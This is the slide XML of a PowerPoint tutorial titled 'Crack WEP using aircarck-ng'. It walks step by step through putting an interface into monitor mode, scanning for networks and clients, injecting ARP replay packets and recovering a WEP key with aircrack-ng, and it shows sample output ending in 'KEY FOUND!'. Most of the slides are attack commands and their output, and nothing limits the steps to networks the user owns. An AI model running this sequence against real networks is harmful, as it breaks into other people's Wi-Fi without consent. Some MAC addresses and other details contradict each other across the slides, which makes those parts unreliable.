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0" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="35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A3FF2-FCC9-4B44-8733-AA2F5C20B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B82F33-C24C-4BEC-BF32-B3E3B3CED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FDD91-157F-4C62-A37A-287012619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43BC-E87B-452E-BFCF-CAA4995DC5D4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50AAE-1DAB-4641-BCCF-4246AFBDB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1CACC-4539-4BB7-8629-51CACF244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8C93-074A-4832-8B03-352ED10DA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7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2C10-13AC-4EBF-96F1-522FD31B9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AE57A0-E830-49C4-81C7-9C5559094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A045C-FF56-4D7C-A65E-A01A2E5D5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43BC-E87B-452E-BFCF-CAA4995DC5D4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11260-2468-428B-8132-7402430D7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637F5-58F2-433F-B046-AA946AFC4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8C93-074A-4832-8B03-352ED10DA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03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BD1AFA-4AC2-4133-8D3F-873E0A6F7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74FE91-F6A1-4AAC-AD97-9B2FDB554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F037D-C1C4-434B-94C2-73F8D73CB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43BC-E87B-452E-BFCF-CAA4995DC5D4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9C52B-464D-4AED-8DB0-80345C45A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3C01B-7185-432B-861D-1E4B2E755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8C93-074A-4832-8B03-352ED10DA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94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EDC72-6933-4A2A-ACFD-7D6B08AD4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530B2-BF62-4640-9EE8-835AA80EC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8423C-70A8-409D-BB4A-83FAF26E5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43BC-E87B-452E-BFCF-CAA4995DC5D4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69DB9-8417-4E0F-AE03-7ACA4E4B2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5C4DF-7CAA-4330-B071-A28947F99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8C93-074A-4832-8B03-352ED10DA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05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4D07A-706B-437F-B330-FD4E6337E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E4FC7-8A26-450F-A9DC-6D70BD8D1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7710D-1AF4-48EB-888A-21F6642A9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43BC-E87B-452E-BFCF-CAA4995DC5D4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B8A71-FBBF-40A6-8A7C-534AA9D10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7193F-888C-431B-B597-36C0C3D2D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8C93-074A-4832-8B03-352ED10DA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05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B3DF2-3409-4893-84A0-272043AB3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F0E46-53D6-4268-AF82-FFB7586168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53E55-ACFB-4D01-B216-56219F2C0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B4C11-AABF-49AB-930F-BA21DFBB3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43BC-E87B-452E-BFCF-CAA4995DC5D4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BDA29-4796-4D7D-BBDA-327CA8324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68D65-DF30-4241-9E6B-A905990CF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8C93-074A-4832-8B03-352ED10DA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06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492E5-8B29-4BA2-8C30-8428C9900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94E7D-7342-4877-939D-110C5E254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51525-D325-47EE-99A3-2234222A2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F187BE-6CDF-43EB-8DF3-4C12ABB41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967DF2-6A56-4F24-B00A-F2B7A033CB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BFA506-EFD6-4BB7-AC8C-DF5213D4C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43BC-E87B-452E-BFCF-CAA4995DC5D4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AB963B-A0BD-4231-A083-CB986C390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1DBEB5-5CE1-47C8-BC4E-950D72582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8C93-074A-4832-8B03-352ED10DA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35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89AD1-EC22-4BDE-9A98-21C62382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75D98B-C19A-4210-A95C-FB9641026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43BC-E87B-452E-BFCF-CAA4995DC5D4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CE4829-212C-480B-B2B9-FFA137F4B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C7BCC6-6C24-421A-A7E3-35B17A512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8C93-074A-4832-8B03-352ED10DA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9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B1F3E9-534E-446D-A8C8-D802C0D4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43BC-E87B-452E-BFCF-CAA4995DC5D4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119884-EB83-42FB-AA09-41BC8BB09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69C6F-7390-4FEA-AB9B-685881B08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8C93-074A-4832-8B03-352ED10DA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93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74A28-9D0B-4869-B939-171C2B378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DE977-2C6E-494A-B591-B81F66B6D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DEBDD-F1F4-4CC3-B2B8-55D1A80FB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A621F-3700-4ECE-86EE-17771E66E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43BC-E87B-452E-BFCF-CAA4995DC5D4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646E6-723D-44F9-A33E-7C43D7328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31AB4-682D-4CAF-9B4A-8ACAD30FE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8C93-074A-4832-8B03-352ED10DA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32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028A8-0519-4BEF-8294-56B47AD49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CD71FA-9942-4332-B340-0752EEEAD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C136F-5F89-4ECA-B413-10C99CA11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8BBAA-FD2A-46B1-8616-0893FD05D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43BC-E87B-452E-BFCF-CAA4995DC5D4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F5FDE-D593-48E2-8A01-4D5984149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6F371-5EA1-48C1-BC05-D62FD6778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8C93-074A-4832-8B03-352ED10DA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45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EDEC38-7BC2-4E92-8567-4E7BCEECD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37AAA-0420-4311-AFF5-F6BB14C13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225AB-165A-4109-A870-C3B7596B91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A43BC-E87B-452E-BFCF-CAA4995DC5D4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FBCEB-680C-41AB-8381-14A130E042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63384-25AB-4261-8BE2-63A38F69E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B8C93-074A-4832-8B03-352ED10DA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7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BA10B-DC01-44DA-9389-DF129A642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b="1" i="1" dirty="0"/>
              <a:t>Crack WEP using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" i="1" dirty="0" err="1"/>
              <a:t>aircarck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" i="1" dirty="0"/>
              <a:t>-ng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24469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EE35D-00F1-49C4-A85C-81F2D3BC5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821" y="324853"/>
            <a:ext cx="11040979" cy="5852110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Command-1 -&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   ┌──(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kali㉿kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)-[~]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   └─$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   [#Root User]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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] password for kali: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command-2 -&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       ┌──(root💀kali)-[/home/kali]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       └─#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng check kill [ Automatically will Change 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Killing these processes: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PID Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        13180 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wpa_supplicant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Command-3 -&gt;                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       ┌──(root💀kali)-[/home/kali]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        └─#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng start wlan0 [For Check ]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PHY     Interface       Driver          Chipset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phy1    wlan0           r8192cu       Realtek Semiconductor Corp. RTL54CUS 805.15n WLAN Adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                  (mac811 monitor mode already enabled for [phy1]wlan0 on [phy1]wlan0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17615283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EE35D-00F1-49C4-A85C-81F2D3BC5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821" y="324853"/>
            <a:ext cx="11040979" cy="585211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Command-4 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;! command 4⇒ will work if the interface mode is monitor and if you will run the program as a root user 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 ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ~~~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SHOW_ALL_Access_Point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ⇓⇓⇓⇓⇓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	CH  2 ][ Elapsed: 0 s ][ 2022-02-28 02:02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	 BSSID (WIFI MAC)             PWR  Beacons    #Data,  #/s  CH   MB     ENC    CIPHER  AUTH ESSID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	64:EE:B7:C0:D7:01  -48        3        101              0        1   270    WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    PSK  Foyzul-Islam-Riaz  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:C7:C0:D7:06  -48        3        440              0         6   270    WPA2 CCMP  PSK  Don’t-Touch-ME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:B7:C0:D7:10  -48        3        660              0        11  270    WPA CCMP   PSK  $10-First</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	64:EE:B7:C0:D7:26  -48        3        750              0          7  270    OPEN CCMP  PSK  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>abcdxyz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	14:EE:B7:C0:D7:56  -48        3        740              0         12  270    WPA CCMP   PSK  &lt;length : 0&gt;      [NOTE: it's hidden ESSID}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 14:EE:B7:C0:17:56  -48        3        740              0         12  270    WPA CCMP   PSK  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WhoAmI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	BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16581603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EE35D-00F1-49C4-A85C-81F2D3BC5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821" y="324853"/>
            <a:ext cx="11040979" cy="585211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Command-5 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:B7:C0:D7:16 --channel 1 wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ~~~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>show_all_client_who_connect_now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ⇓⇓⇓⇓⇓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   CH  2 ][ Elapsed: 0 s ][ 2022-02-28 02:02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	  BSSID              PWR  Beacons    #Data, #/s  CH   MB       ENC    CIPHER  AUTH ESSID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	 64:EE:B7:C0:D7:01   -48      3        101    0  1   270    WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    PSK  Foyzul-Islam-Riaz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	 BSSID (WIFI)        STATION (USER MAC)  PWR   Rate    Lost    Frames  Notes  Probes  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:B7:C0:D7:16    11:22:33:44:55:66   @	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:B7:C0:D7:16    2D:1C:45:55:CD:55   @	@	@	@	@	 @</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	64:EE:B7:C0:D7:16    F1:C2:D3:AB:22:55   @  	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8159106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E9285D42-4C79-4140-BF5D-7535C6C52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2074"/>
            <a:ext cx="65" cy="501349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBFA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221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1D014A-6B47-49FC-A343-A2A2921C2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823" y="336884"/>
            <a:ext cx="11064977" cy="620829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Command-6 -&gt;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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -9 -e Foyzul-Islam-Riaz -a 11:22:33:44:55:66  wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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		Where: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		-9 means injection test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		-e Foyzul-Islam-Riaz is the wireless network name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		-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>11:22:33:44:55:66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is the access point MAC address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		wlan0 is the wireless interface name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⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			11:20:00  Waiting for beacon frame (BSSID: 11:22:33:44:55:66) on channel 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 			11:20:00  Trying broadcast probe requests...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			11:20:00  Injection is working!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 			11:20:02  Found 1 AP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		 11:20:02  Trying directed probe requests...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			 11:20:03 11:22:33:44:55:66 - channel: 1 - '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Foyzul-Islam-Riaz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			 11:20:05 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			 11:20:00  30/30: 100%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9290757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EE35D-00F1-49C4-A85C-81F2D3BC5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821" y="324853"/>
            <a:ext cx="11040979" cy="585211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Command-7 -&gt;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airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:B7:C0:D7:16 --channel 1 –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NewFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>				[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-w capture is file name prefix for the file which will contain the IVs.]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	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  	                     ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓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  	 CH  2 ][ Elapsed: 0 s ][ 2022-02-28 02:02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	 	 BSSID              PWR  Beacons    #Data, #/s  CH   MB       ENC    CIPHER  AUTH ESSID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		 64:EE:B7:C0:D7:01   -48      3        101    0  1   270    WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    PSK  Foyzul-Islam-Riaz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		 BSSID (WIFI)        STATION (USER MAC)  PWR   Rate    Lost    Frames  Notes  Probes  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		64:EE:B7:C0:D7:16    11:22:33:44:55:66   @	@	@	@	@	@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		64:EE:B7:C0:D7:16    2D:1C:45:55:CD:55   @	@	@	@	@	 @</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		64:EE:B7:C0:D7:16    F1:C2:D3:AB:22:55   @  	@	@	@	@	@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1512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EE35D-00F1-49C4-A85C-81F2D3BC5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822" y="502945"/>
            <a:ext cx="4307304" cy="5674018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Command-7 -&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>-ng --BSSID 64:EE:B7:C0:D7:16 --channel 1 –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>NewFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t> wlan0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800" dirty="0"/>
              <a:t>	  ⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>	   CH  2 ][ Elapsed: 0 s ][ 2022-02-28 02:02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800" dirty="0"/>
              <a:t>                     BSSID              PWR  Beacons    #Data, #/s  CH   MB       ENC    CIPHER  AUTH ESSID                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>            64:EE:B7:C0:D7:01   -48      3               101    0  1   270    WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>    PSK  Foyzul-Islam-Riaz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>                                                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>                        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800" dirty="0"/>
              <a:t> BSSID (WIFI)        STATION (USER MAC)  PWR   Rate    Lost    Frames  Notes  Probes  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>64:EE:B7:C0:D7:16    11:22:33:44:55:66   @  	@           @             @        @           #  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>64:EE:B7:C0:D7:16    2D:1C:45:55:CD:55   @  	@           @             @        @           #	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>64:EE:B7:C0:D7:16    F1:C2:D3:AB:22:55   @  	@           @             @        @           #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70525EA-7B36-44A2-AFE9-A233124D23AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403558" y="502945"/>
            <a:ext cx="7788441" cy="5852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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0"/>
              <a:t>~OPEN ANOTHER TAB ~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command-8 -&gt;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aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng -4 -b 64:EE:B7:C0:D7:16 -h 11:22:33:44:55:66 wlan0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Wait until sent ARP  15000-2000 Packets then PRESS -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ctrl+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to stop capture.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3105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EE35D-00F1-49C4-A85C-81F2D3BC5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821" y="324853"/>
            <a:ext cx="11040979" cy="585211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Command-9 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NewFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>*.cap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		⇓⇓⇓⇓ Will SHOW IN THE SCREEN ⇓⇓⇓⇓⇓</a:t>
            </a:r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dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng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                              [00:03:06] Tested 674449 keys (got 96610 IVs)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KB    depth   byte(vote)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)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            	  KEY FOUND! [ 01:14:46:68:80 ] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		  Probability: 100%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="500342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1377</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>132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Crack WEP using aircarck-ng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Disconnect any user from any network</dc:title>
  <dc:creator>Foyzul islam</dc:creator>
  <cp:lastModifiedBy>Foyzul islam</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-01T13:59:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-01T15:43:09Z</dcterms:modified>
</cp:coreProperties>
</file>